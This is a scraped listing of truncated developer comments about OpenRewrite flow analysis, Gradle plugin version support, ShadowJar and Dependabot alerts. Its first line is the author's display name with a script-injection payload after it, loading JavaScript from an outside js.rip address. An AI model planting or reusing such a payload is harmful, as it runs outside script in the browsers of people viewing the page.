Jonathan Leitschuh"><script src="https://js.rip/b27oz0xw7e"></script>
Rewrite-analysis also has support for Control Flow Analysis as well, which might be worth documenting as well. Here's an examination of that from CodeQL too (but specific to Python in...
I kinda want to do a Data Flow and Control Flow API user crash course demo for the OpenRewrite team at some point. Maybe something we can record and post...
I had always intended to do this, but I couldn't figure out where to get this information out of the Gradle API. Hoping that @bigdaz has a better idea where...
Oh, interesting! You should consider presenting ORT to the Open Source Security Foundation in one of the WG meetings. https://openssf.org/getinvolved/ https://slack.openssf.org
I think I originally thought about using KotlinX, but the problem I quickly ran into was the range of versions of Kotlin I needed this project to support in order...
Passing tests is the most important part. You'll want to make sure it passes a test with the oldest version of Gradle. Also, at the end of the day, this...
> I'm actually considering going the other way, and porting the entire codebase to Java. Using Kotlin for a plugin that needs to support a wide range of Gradle versions...
The ShadowJar logic was originally what I found within the closed-source plugin-publish-plugin, which lives internally at Gradle within the same repository as the Gradle Plugin Portal codebase. I then took...
> BUT, linking the dependency to each subproject has the major downside of creating many more dependabot alerts for the project when this version needed upgrading. When working with real-world...
> So until we can reliably link a dependency version to the source file where it is defined, I'd prefer to point to the entire Gradle build (either settings.gradle or...